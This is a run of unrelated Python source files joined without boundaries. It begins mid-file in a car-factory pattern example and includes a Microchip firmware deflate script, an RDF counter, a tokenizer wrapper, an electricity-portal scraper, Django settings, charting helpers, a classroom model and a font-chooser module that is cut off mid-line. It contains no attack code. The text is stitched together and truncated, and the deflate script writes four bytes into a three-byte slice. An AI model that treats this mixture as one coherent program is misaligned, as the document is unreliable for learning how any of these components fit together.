Gla(Suv): def creating_suv(self): print("This is your suv benz gla. . . ") class X1(Suv): def creating_suv(self): print("This is your suv bmw x1. . .") # ------------------------------------------------------------- class Cls(Coupe): def creating_coupe(self): print("This is your coupe benz cls. . .") class M2(Coupe): def creating_coupe(self): print("This is your coupe bmw m2. . .") # ------------------------------------------------------------- def client_suv(order): suv = order.call_suv() suv.creating_suv() def client_coupe(order): coupe = order.call_coupe() coupe.creating_coupe() # ------------------------------------------------------------- """Test the app""" client_coupe(Bmw()) client_coupe(Benz()) client_suv(Benz()) client_suv(Bmw()) 1-10 #!/usr/bin/env python3 #============================================================================== # # MPFS HSS Deflate Stage # # Copyright 2021 Microchip Corporation. # # SPDX-License-Identifier: MIT # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # # # This script takes an HSS-L2LIM image and compresses it for storage in eNVM # using Deflate # #============================================================================== import argparse import zlib import sys import base64 def deflate(data, compressionLevel=4): compressor = zlib.compressobj(level=compressionLevel, method=zlib.DEFLATED, wbits=zlib.MAX_WBITS, memLevel=zlib.DEF_MEM_LEVEL, strategy=0) deflatedBytes = compressor.compress(data) + compressor.flush() return deflatedBytes def inflate(data): decompressor = zlib.decompressobj(-zlib.MAX_WBITS) inflatedBytes = decompressor.decompress(data) + decompressor.flush() return inflatedBytes def get_script_version(): return "1.0.0" def get_header_bytes(compressedCrc, originalCrc, compressedImageLen, originalImageLen): # # This function must output a header that is in-sync with # include/hss-types.h ... # # #pragma pack(8) # struct HSS_CompressedImage { # uint32_t magic; # uint32_t version; # size_t headerLength; # uint32_t headerCrc; # uint32_t compressedCrc; # uint32_t originalCrc; # size_t compressedImageLen; # size_t originalImageLen; # uint8_t hash[32]; # uint8_t ecdsaSig[32]; # }; # #define mHSS_COMPRESSED_MAGIC (0xC08B8355u) # #define mHSS_COMPRESSED_VERSION_FASTLZ 1u # #define mHSS_COMPRESSED_VERSION_MINIZ 2u # # offsetof(magic): 0 # offsetof(version): 4 # offsetof(headerLength): 8 # offsetof(headerCrc): 16 # offsetof(compressedCrc): 20 # offsetof(originalCrc): 24 # offsetof(compressedImageLen): 32 # offset_of(originalImageLen): 40 # offsetof(hash): 48 # offsetof(ecdsaSig): 80 header = bytearray(112) header[0:3] = 0xC08B8355.to_bytes(4, "little") # magic header[4:8] = 0x2.to_bytes(4, "little") # version header[8:16] = 0x0.to_bytes(8, "little") # headerLength placeholder header[16:20]= 0x0.to_bytes(4, "little") # headerCrc placeholder header[20:24] = compressedCrc.to_bytes(4, "little") # compressedCrc header[24:32] = originalCrc.to_bytes(4, "little") # originalCrc header[32:40] = compressedImageLen.to_bytes(8, "little") # compressedImageLen header[40:48] = originalImageLen.to_bytes(8, "little") # originalImageLen header[48:80] = bytearray(32) # hash32 placeholder header[80:112] = bytearray(32) # ecdsaSig32 placeholder headerLength = len(header) header[8:12] = headerLength.to_bytes(4, "little") # headerLength header[12:16] = 0x0.to_bytes(4, "little") # padding headerCrc = zlib.crc32(header) header[16:20] = headerCrc.to_bytes(4, "little") # headerCrc if (args.verbose): print("Header length is %d (0x%08X)" %(headerLength, headerLength) ) print("Header CRC is 0x%08X" %(headerCrc) ) return header def main(): parser = argparse.ArgumentParser(description = 'Deflate HSS-L2LIM image') parser.add_argument('--verbose', '-v', action='count', default=0) parser.add_argument('imageFileIn') parser.add_argument('deflatedFileOut') global args args = parser.parse_args() if (args.verbose): print("Reading image from " + args.imageFileIn) with open(args.imageFileIn, 'rb') as fileIn: imageData = fileIn.read() imageLen = len(imageData) if (args.verbose): print("Reading %d (0x%08X) bytes" %(imageLen, imageLen) ) imageCrc = zlib.crc32(imageData) if (args.verbose): print("Image CRC is 0x%08X" %(imageCrc) ) print("Deflating...") deflatedData = deflate(imageData) deflatedLen = len(deflatedData) deflatedCrc = zlib.crc32(deflatedData) if (args.verbose): print("Deflated CRC is 0x%08X" %(deflatedCrc) ) print("Deflated length %d (0x%08X) bytes" %(deflatedLen, deflatedLen) ) print("Outputting to " + args.deflatedFileOut) headerData = get_header_bytes(compressedCrc=deflatedCrc, originalCrc=imageCrc, compressedImageLen=deflatedLen, originalImageLen=imageLen) with open(args.deflatedFileOut, "wb") as fileOut: outputSize = fileOut.write(headerData) outputSize += fileOut.write(deflatedData) if (args.verbose): print("Wrote %d (0x%08X) bytes" %(outputSize, outputSize) ) # # # if __name__ == "__main__": main() from rdflib import Graph import csv import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np from pprint import pprint from optparse import OptionParser import os def main(): parser = OptionParser(usage="usage: %prog [options]") parser.add_option('-i', '--input-file', action='store', help='The input file containing RDF triples') (options, args) = parser.parse_args() if not options.input_file: parser.print_help(); exit(1) g = Graph() if options.input_file.endswith('nt'): g.parse(options.input_file, format='nt') elif options.input_file.endswith('ttl'): g.parse(options.input_file, format='turtle') query_amount_triples = """ SELECT (COUNT(*) as ?amountTriples) WHERE { ?s ?p ?o . } """ query_amount_observations = """ PREFIX qb: SELECT (COUNT(*) as ?amountObservations) WHERE { ?obs a qb:Observation . } """ print("Number of triples:") triple_amount = g.query(query_amount_triples) for t in triple_amount: print(t) print("Number of DataCube observations:") observations_amount = g.query(query_amount_observations) for o in observations_amount: print(o) main() from flask import jsonify import flask @app.route('/v1/domains', methods=['GET']) def domain_list(): return jsonify( status = 'success', data = None )widget = WidgetDefault() widget.width = 20 widget.background = "Fill" commonDefaults["ScrollBarWidget"] = widget def generateScrollBarWidget(file, screen, bar, parentName): name = bar.getName() file.write(" %s = leScrollBarWidget_New();" % (name)) generateBaseWidget(file, screen, bar) orientation = getOrientation(bar.getOrientation().toString()) if orientation != "LE_ORIENTATION_VERTICAL": file.write(" %s->fn->setOrientation(%s, LE_ORIENTATION_HORIZONTAL, LE_FALSE);" % (name, name)) writeSetInt(file, name, "MaximumValue", bar.getMax(), 100) writeSetInt(file, name, "ExtentValue", bar.getExtent(), 10) writeSetInt(file, name, "StepSize", bar.getStep(), 1) writeSetInt(file, name, "ScrollValue", bar.getValue(), 0) writeEvent(file, name, bar, "ValueChangedEvent", "ValueChangedEventCallback", "OnValueChanged") file.write(" %s->fn->addChild(%s, (leWidget*)%s);" % (parentName, parentName, name)) file.writeNewLine() def generateScrollBarEvent(screen, widget, event, genActions): text = "" if event.name == "ValueChangedEvent": text += "void %s_OnValueChanged(%s)\n" % (widget.getName(), getWidgetVariableName(widget)) text += generateActions(widget, event, genActions, None, None) return text def generateScrollBarAction(text, variables, owner, event, action): name = action.targetName if action.actionID == "SetOrientation": val = getOrientation(getActionArgumentValue(action, "Orientation")) writeActionFunc(text, action, "setOrientation", [val, "LE_TRUE"]) elif action.actionID == "SetMax": val = getActionArgumentValue(action, "Max") writeActionFunc(text, action, "setMaximumValue", [val]) elif action.actionID == "SetExtent": val = getActionArgumentValue(action, "Extent") writeActionFunc(text, action, "setExtentValue", [val]) elif action.actionID == "SetValue": val = getActionArgumentValue(action, "Value") writeActionFunc(text, action, "setScrollValue", [val]) elif action.actionID == "SetValuePercent": val = getActionArgumentValue(action, "Value") writeActionFunc(text, action, "setScrollPercentage", [val]) elif action.actionID == "SetStepSize": val = getActionArgumentValue(action, "Size") writeActionFunc(text, action, "setStepSize", [val]) elif action.actionID == "StepBackward": writeActionFunc(text, action, "stepBackward", []) elif action.actionID == "StepForward": writeActionFunc(text, action, "stepForward", []) else: generateWidgetAction(text, variables, owner, event, action)import tensorflow as tf import sentencepiece as sp from typing import List def create_text_encoder(encoder_type: str, model_file: str): if encoder_type == "sentencepiece": return ParsingOps(model_file) elif encoder_type == "sentencepieceWithSplitSymbol": return ParsingOps(model_file,"") class ParsingOps(object): def __init__(self, model_file: str, shift_token: int = 103, split_symbol: str = ""): self._tokenizer = sp.SentencePieceProcessor() self._model = tf.io.gfile.GFile(model_file, "rb").read() self._tokenizer.LoadFromSerializedProto(self._model) self._split_symbol = split_symbol self._shift_token = shift_token # id_0 = pad, id_1 = eos @property def vocabulary_size(self) -> int: return self._tokenizer.GetPieceSize() + self._shift_token def encode(self, text: str) -> List[int]: if self._split_symbol: text = text.replace("\n", self._split_symbol) ids = self._tokenizer.EncodeAsIds(text) ids = [i + self._shift_token if i > 1 else i for i in ids] return ids def decode(self, ids:List[int]) -> str: ids = [i - self._shift_token if i > 1 + self._shift_token else i for i in ids] text = self._tokenizer.DecodeIds(ids) if self._split_symbol: text = text.replace(self._split_symbol, "\n") return text shirayu/koyo_elec-dumperdump.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- ''' Download koyo electric data ''' import argparse import urllib.request import sys import http.cookiejar import re import json import codecs LOGIN_URL = 'https://www.k-epco.net/koyo/portal' LOGIN_POST_URL = 'https://www.k-epco.net/koyo/portal/login' GRAPH_URL = 'https://www.k-epco.net/koyo/portal/graph/daily/?data_month=' def get_token(opener): ''' Get login token ''' res = opener.open(urllib.request.Request(url=LOGIN_URL)) if res.status != 200: sys.exit(1) body = res.read().decode('utf8') token = re.search(r'name="_token" value="([^"]*)"', body).group(1) return token def login(opener, token, email, password): ''' login ''' data = { '_token': token, 'email': email, 'password': password, } encoded_post_data = json.dumps(data).encode(encoding='ascii') res = opener.open(urllib.request.Request(url=LOGIN_POST_URL, headers={"Content-Type": "application/json"}, data=encoded_post_data, method='POST')) body = res.read().decode('utf8') if res.status != 200 or "間違って" in body: sys.exit(1) def get_page(opener, year, month): ''' Get month data ''' res = opener.open(urllib.request.Request(url="%s%04d%02d" % (GRAPH_URL, year, month))) if res.status != 200: sys.exit(1) body = res.read().decode('utf8') data = re.search(r'columns: (.*)\n', body).group(1).rstrip(',') return data def operation(cfg, year, month): ''' Stub ''' opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor( http.cookiejar.CookieJar())) token = get_token(opener) login(opener, token, cfg["id"], cfg["password"]) data = get_page(opener, year, month) return data def main(): ''' Parse arguments ''' oparser = argparse.ArgumentParser() oparser.add_argument("-c", "--config", dest="config", default=None, required=True) oparser.add_argument("-o", "--output", dest="output") oparser.add_argument("-y", "--year", dest="year", type=int, required=True) oparser.add_argument("-m", "--month", dest="month", type=int, required=True) opts = oparser.parse_args() cfg = None with open(opts.config) as fhdl: cfg = json.loads(fhdl.read()) data = operation(cfg, opts.year, opts.month) with codecs.open(opts.output, "w", "utf8") as outf: outf.write(data) outf.write("\n") if __name__ == '__main__': main() from timeatlas.time_series_dataset import TimeSeriesDataset from timeatlas.models.NN.util import chunkify from .base_dataset import BaseDataset class TimeSeriesPredictionDataset(BaseDataset): """ A DataLoader for the prediction of a TimeSeries n next steps, where X: TimeSeries n previous steps y: next step of the TimeSeries """ def __init__(self, timeseriesdataset: TimeSeriesDataset, n: int or None): """ Args: data: TimeSeriesDataset n: number of previous steps """ super(TimeSeriesPredictionDataset, self).__init__(tsd=timeseriesdataset) self.data, self.labels = chunkify(tsd=timeseriesdataset.data, seq_len=n) def __len__(self): return len(self.data) def __getitem__(self, item): return self.data[item], self.labels[item] # coding: utf-8 import os from datetime import timedelta BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__))) # Set template_path and template_dir TEMPLATE_PATH = os.path.join(BASE_DIR, 'templates') TEMPLATE_DIRS = ( TEMPLATE_PATH, ) # Set databases_name DATABASES_NAME = os.path.join(BASE_DIR, 'mysite.db') ADMINS = ( ('', ''), ) DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': DATABASES_NAME, # Or path to database file if using sqlite3. # The following settings are not used with sqlite3: 'USER': '', 'PASSWORD': '', 'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP. 'PORT': '', # Set to empty string for default. } } # Hosts/domain names that are valid for this site; required if DEBUG is False # See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts ALLOWED_HOSTS = ['*'] # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # In a Windows environment this must be set to your system time zone. TIME_ZONE = 'America/Los_Angeles' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' # grr, Django testing framework stupidly uses this as signal that # code is pre-1.6, whereas it STILL seems to be required for app to run. SITE_ID = 1 # required to stop false positive warning messages SILENCED_SYSTEM_CHECKS = ['1_6.W001'] # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale. USE_L10N = True # If you set this to False, Django will not use timezone-aware datetimes. USE_TZ = True # Absolute filesystem path to the directory that will hold user-uploaded files. # Example: "/var/www/example.com/media/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash. # Examples: "http://example.com/media/", "http://media.example.com/" MEDIA_URL = '' # Absolute path to the directory static files should be collected to. # Don't put anything in this directory yourself; store your static files # in apps' "static/" subdirectories and in STATICFILES_DIRS. # Example: "/var/www/example.com/static/" STATIC_ROOT = '' # URL prefix for static files. # Example: "http://example.com/static/", "http://static.example.com/" STATIC_URL = '/static/' # Additional locations of static files STATICFILES_DIRS = ( # Put strings here, like "/home/html/static" or "C:/www/django/static". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) # List of finder classes that know how to find static files in # various locations. STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) # URL of the login page. LOGIN_URL = '/login/' LOGIN_REDIRECT_URL = '/done/' URL_PATH = '' # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', # 'django.template.loaders.eggs.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # Uncomment the next line for simple clickjacking protection: 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'ct.middleware.MySocialAuthExceptionMiddleware', ) ROOT_URLCONF = 'mysite.urls' # Python dotted path to the WSGI application used by Django's runserver. WSGI_APPLICATION = 'mysite.wsgi.application' INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', # Uncomment the next line to enable the admin: 'django.contrib.admin', # Uncomment the next line to enable admin documentation: # 'django.contrib.admindocs', 'crispy_forms', 'ct', 'fsm', # LTI 'lti', # Socials 'social.apps.django_app.default', 'psa', ) CRISPY_TEMPLATE_PACK = 'bootstrap3' SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer' TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', 'django.core.context_processors.tz', 'django.contrib.messages.context_processors.messages', 'social.apps.django_app.context_processors.backends', 'social.apps.django_app.context_processors.login_redirect', 'psa.context_processors.debug_settings', ) AUTHENTICATION_BACKENDS = ( 'social.backends.twitter.TwitterOAuth', 'social.backends.facebook.FacebookOAuth2', 'social.backends.google.GoogleOAuth2', 'social.backends.linkedin.LinkedinOAuth2', 'social.backends.khanacademy.KhanAcademyOAuth1', 'psa.custom_backends.EmailAuth', 'django.contrib.auth.backends.ModelBackend', ) SOCIAL_AUTH_PIPELINE = ( 'social.pipeline.social_auth.social_details', 'social.pipeline.social_auth.social_uid', 'social.pipeline.social_auth.auth_allowed', 'psa.pipeline.social_user', 'social.pipeline.user.get_username', 'psa.pipeline.custom_mail_validation', 'psa.pipeline.associate_by_email', 'social.pipeline.user.create_user', 'psa.pipeline.validated_user_details', # 'psa.pipeline.password_ask', 'psa.pipeline.associate_user', 'social.pipeline.social_auth.load_extra_data', 'social.pipeline.user.user_details', ) SOCIAL_AUTH_DISCONNECT_PIPELINE = ( # 'psa.pipeline.password_check', 'social.pipeline.disconnect.allowed_to_disconnect', 'social.pipeline.disconnect.get_entries', 'social.pipeline.disconnect.revoke_tokens', 'social.pipeline.disconnect.disconnect' ) PROTECTED_USER_FIELDS = ['first_name', 'last_name', 'email'] FORCE_EMAIL_VALIDATION = True PASSWORDLESS = True SOCIAL_AUTH_EMAIL_VALIDATION_FUNCTION = 'psa.mail.send_validation' SOCIAL_AUTH_EMAIL_VALIDATION_URL = '/email-sent/' SOCIAL_AUTH_STRATEGY = 'psa.custom_django_strategy.CustomDjangoStrategy' SOCIAL_AUTH_STORAGE = 'psa.custom_django_storage.CustomDjangoStorage' SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = [ 'https://www.googleapis.com/auth/userinfo.email', 'https://www.googleapis.com/auth/userinfo.profile' ] # Facebook email scope declaring SOCIAL_AUTH_FACEBOOK_SCOPE = ['email'] # Add email to requested authorizations. SOCIAL_AUTH_LINKEDIN_OAUTH2_SCOPE = ['r_basicprofile', 'r_emailaddress'] # Add the fields so they will be requested from linkedin. SOCIAL_AUTH_LINKEDIN_OAUTH2_FIELD_SELECTORS = ['email-address', 'headline', 'industry'] # Arrange to add the fields to UserSocialAuth.extra_data SOCIAL_AUTH_LINKEDIN_OAUTH2_EXTRA_DATA = [('id', 'id'), ('firstName', 'first_name'), ('lastName', 'last_name'), ('emailAddress', 'email_address'), ('headline', 'headline'), ('industry', 'industry')] # LTI Parameters X_FRAME_OPTIONS = "GOFORIT" # SSL proxy fix SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') BROKER_URL = 'amqp://' CELERY_RESULT_BACKEND = 'amqp://' CELERY_TIMEZONE = 'UTC' CELERYBEAT_SCHEDULE = { 'check_anonymous': { 'task': 'mysite.celery.check_anonymous', 'schedule': timedelta(days=1), } } # Cache settings CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache', 'LOCATION': '127.0.0.1:11211', } } # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler' }, }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, 'lti_debug': { 'handlers': ['console'], 'level': 'INFO', }, 'celery_warn': { 'handlers': ['console'], 'level': 'INFO', }, } } jacobcolbert/altair-transform from typing import Any import pandas as pd import altair as alt from .visitor import visit from ..utils import to_dataframe # These submodules register appropriate visitors. from . import (aggregate, bin, calculate, filter, flatten, fold, # noqa: F401 impute, joinaggregate, lookup, sample, timeunit, window) __all__ = ['apply', 'extract_data', 'process_chart'] def apply(df: pd.DataFrame, transform: Any, inplace: bool = False) -> pd.DataFrame: """Apply transform or transforms to dataframe. Parameters ---------- df : pd.DataFrame transform : list|dict A transform specification or list of transform specifications. Each specification must be valid according to Altair's transform schema. inplace : bool If True, then dataframe may be modified in-place. Default: False. Returns ------- df_transformed : pd.DataFrame The transformed dataframe. """ if not inplace: df = df.copy() if transform is alt.Undefined: return df return visit(transform, df) def extract_data(chart: alt.Chart) -> pd.DataFrame: """Extract transformed data from a chart. This only works with data and transform defined at the top level of the chart. Parameters ---------- chart : alt.Chart The chart instance from which the data and transform will be extracted Returns ------- df_transformed : pd.DataFrame The extracted and transformed dataframe. """ return apply(to_dataframe(chart.data, chart), chart.transform) def transform_chart(chart: alt.Chart) -> alt.Chart: """Return a chart with the transformed data Parameters ---------- chart : alt.Chart The chart instance from which the data and transform will be extracted. Returns ------- chart_out : alt.Chart A copy of the input chart with the transformed data. """ chart = chart.properties(data=extract_data(chart)) chart.transform = alt.Undefined return chart from __future__ import annotations import uuid from abc import abstractmethod from copy import deepcopy from dataclasses import dataclass from datetime import datetime, timedelta from typing import List from uuid import UUID import arrow import pytz from domain.classroom.attendee import Attendee from domain.classroom.classroom_type import ClassroomSubject from domain.classroom.date_time_comparator import DateTimeComparator, DateComparator from domain.classroom.duration import Duration, MinuteTimeUnit, HourTimeUnit, TimeUnit from domain.datetimes import Weekdays from domain.exceptions import DomainException from domain.repository import AggregateRoot @dataclass class Schedule: start: datetime stop: datetime class Classroom(AggregateRoot): def __init__(self, name: str, position: int, schedule: Schedule, subject: ClassroomSubject, duration: Duration): super().__init__() self._name = name self._position = position self._schedule = schedule self._duration = duration self._attendees: [Attendee] = [] self._subject = subject @property def name(self) -> str: return self._name @property def position(self) -> int: return self._position @property def schedule(self) -> Schedule: return self._schedule @property def duration(self) -> Duration: return self._duration @property def attendees(self) -> List[Attendee]: return self._attendees @property def subject(self) -> ClassroomSubject: return self._subject @staticmethod def create(name: str, start_date: datetime, position: int, subject: ClassroomSubject, stop_date: datetime = None, duration: Duration = Duration(HourTimeUnit(1))) -> Classroom: if not stop_date: stop_date = start_date + timedelta(hours=duration.time_unit.to_unit(HourTimeUnit).value) classroom = Classroom(name, position, Schedule(start=start_date, stop=stop_date), subject, duration) return classroom def all_attendees(self, attendees: [Attendee]): if self._position < len(attendees): raise DomainException( f"Cannot add anymore attendees (position available: {self._position - len(self._attendees)} - attendee(s) you try to add: {len(attendees)})") self._attendees = attendees def next_session(self) -> ScheduledSession: if self.__has_session_today() or (self.__today_is_sunday() and self.__next_session_on_monday()): start: datetime = datetime.utcnow().replace(hour=self._schedule.start.hour, minute=self._schedule.start.minute, second=0, microsecond=0, tzinfo=self._schedule.start.tzinfo or pytz.utc) return ScheduledSession.create(self, start) def __has_session_today(self) -> bool: return DateTimeComparator(self._schedule.start, datetime.now()).same_date().compare() or (self._schedule.stop and DateTimeComparator(datetime.now(), self._schedule.start).same_day().compare()) def __today_is_sunday(self): return datetime.now().today().isoweekday() == Weekdays.SUNDAY def __next_session_on_monday(self): monday: datetime = datetime.now() + timedelta(days=1) return monday.isoweekday() == Weekdays.MONDAY def confirm_session_at(self, session_date: datetime) -> ConfirmedSession: return ConfirmedSession.create(self, session_date) def sessions_in_range(self, start_date: datetime, end_date: datetime) -> List[Session]: days: [datetime] = list(map(lambda day_range: day_range.date(), arrow.Arrow.range('day', start_date, end_date))) sessions: [Session] = [] classroom_start_date = self.schedule.start for day in days: if DateComparator(classroom_start_date.date(), day).same_day().before().compare() \ and DateComparator(day, end_date.date()).before().compare() \ and DateComparator(day, self.schedule.stop.date()).before().compare(): sessions.append(Session(self.id, self.name, self.position, self.subject, datetime(day.year, day.month, day.day, classroom_start_date.hour, classroom_start_date.minute, tzinfo=pytz.utc if classroom_start_date.tzinfo is None else classroom_start_date.tzinfo), self.duration.time_unit, self.attendees)) return sessions class Session: def __init__(self, classroom_id: UUID, name: str, position: int, subject: ClassroomSubject, start: datetime, classroom_duration: TimeUnit, attendees: [Attendee]) -> None: self.__name: str = name self.__position: int = position self.__subject: ClassroomSubject = subject self.__attendees: List[Attendee] = deepcopy(attendees) self.__start: datetime = start.astimezone(pytz.utc) if start.tzinfo is None else start self.__stop: datetime = self.__start + timedelta(minutes=classroom_duration.to_unit(MinuteTimeUnit).value) self.__classroom_id: UUID = classroom_id @property def classroom_id(self): return self.__classroom_id @property def attendees(self): return self.__attendees @property def name(self): return self.__name @property def position(self): return self.__position @property def start(self): return self.__start @property def stop(self): return self.__stop @property def subject(self) -> ClassroomSubject: return self.__subject @property @abstractmethod def id(self): return None class ScheduledSession(Session): @staticmethod def create(classroom: Classroom, start) -> ScheduledSession: return ScheduledSession(classroom.id, classroom.name, classroom.position, classroom.subject, start, classroom.duration.time_unit, classroom.attendees) @property def id(self): return None class ConfirmedSession(Session, AggregateRoot): def __init__(self, classroom_id: UUID, name: str, position: int, subject: ClassroomSubject, start: datetime, duration_time_unit: TimeUnit, attendees: [Attendee]) -> None: super().__init__(classroom_id, name, position, subject, start, duration_time_unit, attendees) self._id = uuid.uuid4() @staticmethod def create(classroom: Classroom, start: datetime) -> ConfirmedSession: if not DateTimeComparator(classroom.schedule.start, start).same_day().same_time().before().compare(): raise InvalidSessionStartDateException(classroom, start) return ConfirmedSession(classroom.id, classroom.name, classroom.position, classroom.subject, start, classroom.duration.time_unit, classroom.attendees) @property def id(self): return self._id def checkin(self, attendee: Attendee) -> Attendee: try: registered_attendee = next(filter(lambda current_attendee: current_attendee == attendee, self.attendees)) registered_attendee.checkin() return registered_attendee except StopIteration: raise DomainException(f"Attendee with id {str(attendee.id)} could not be checked in") def checkout(self, attendee: Attendee) -> Attendee: try: checked_out_attendee: Attendee = next(filter(lambda current_attendee: current_attendee == attendee, self.attendees)) checked_out_attendee.checkout() return checked_out_attendee except StopIteration: raise DomainException(f"Attendee with id {str(attendee.id)} could not be checked out") def cancel(self, attendee: Attendee) -> None: self.attendees.remove(attendee) class InvalidSessionStartDateException(DomainException): def __init__(self, classroom: Classroom, start_date: datetime, *args: object) -> None: if start_date < classroom.schedule.start: message = f"Classroom '{classroom.name}' starting at '{classroom.schedule.start.isoformat()}' cannot be set before" else: weekdays_difference = abs(classroom.schedule.start.date().weekday() - start_date.date().weekday()) closest_prior_date = datetime.combine((start_date.date() - timedelta(days=weekdays_difference)), classroom.schedule.start.time()).replace(tzinfo=pytz.utc) closest_following_date = datetime.combine((start_date.date() + timedelta(days=7 - weekdays_difference)), classroom.schedule.start.time()).replace(tzinfo=pytz.utc) message = f"Classroom '{classroom.name}' starting at '{classroom.schedule.start.isoformat()}' cannot be set at '{start_date.isoformat()}', closest possible dates are '{closest_prior_date.isoformat()}' or '{closest_following_date.isoformat()}'" super().__init__(message, *args) venv/Lib/site-packages/tkfontchooser.py # -*- coding: utf-8 -*- """ tkFontChooser - Font chooser for Tkinter Copyright 2016-2017 <> tkFontChooser is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. tkFontChooser is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ try: from tkinter import Toplevel, Listbox, StringVar, BooleanVar, TclError from tkinter.ttk import Checkbutton, Frame, Label, Button, Scrollbar, Style, Entry from tkinter.font import families, Font except ImportError: from Tkinter import Toplevel, Listbox, StringVar, BooleanVar from ttk import Checkbutton, Frame, Label, Button, Scrollbar, Style, Entry from tkFont import families, Font from locale import getdefaultlocale __version__ = "2.0.2" # --- translation EN = {"Cancel": "Cancel", "Bold": "Bold", "Italic": "Italic", "Underline": "Underline", "Overstrike": "Strikethrough"} FR = {"Cancel": "Annuler", "Bold": "Gras", "Italic": "Italique", "Underline": "Souligné", "Overstrike": "Barré"} IT = {"Cancel": "Annulla", "Bold": "Grassetto", "Italic": "Corsivo", "Underline": "Sottolineato", "Overstrike": "Barrato"} LANGUAGES = {"fr": FR, "en": EN, "it": IT} if getdefaultlocale()[0][:2] == "fr": TR = LANGUAGES["fr"] elif getdefaultlocale()[0][:2] == "it": TR = LANGUAGES["it"] else: TR = LANGUAGES["en"] # --- FontChooser class class FontChooser(Toplevel): """.Font chooser dialog.""" def __init__(self, master, font_dict={}, text="Abcd", title="Font Chooser", **kwargs): """ Create a new FontChooser instance. Arguments: master: master window font_dict: dictionnary, like the one returned by the .actual method of a Font object: {'family': 'DejaVu Sans', 'overstrike': False, 'size': 12, 'slant': 'italic' or 'roman', 'underline': False, 'weight': 'bold' or 'normal'} text: text to be displayed in the preview label title: window title **kwargs: additional keyword arguments to be passed to Toplevel.__init__ """ Toplevel.__init__(self, master, **kwargs) self.title(title) self.resizable(False, False) self.protocol("WM_DELETE_WINDOW", self.quit) self._validate_family = self.register(self.validate_font_family) self._validate_size = self.register(self.validate_font_size) # --- variable storing the chosen font self.res = "" style = Style(self) style.configure("prev.TLabel", background="white") bg = style.lookup("TLabel", "background") self.configure(bg=bg) # --- family list self.fonts = list(set(families())) self.fonts.append("TkDefaultFont") self.fonts.sort() for i in range(len(self.fonts)): self.fonts[i] = self.fonts[i].replace(" ", "\ ") max_length = int(2.5 * max([len(font) for font in self.fonts])) // 3 self.sizes = ["%i" % i for i in (list(range(6, 17)) + list(range(18, 32, 2)))] # --- font default font_dict["weight"] = font_dict.get("weight", "normal") font_dict["slant"] = font_dict.get("slant", "roman") font_dict["underline"] = font_dict.get("underline", False) font_dict["overstrike"] = font_dict.get("overstrike", False) font_dict["family"] = 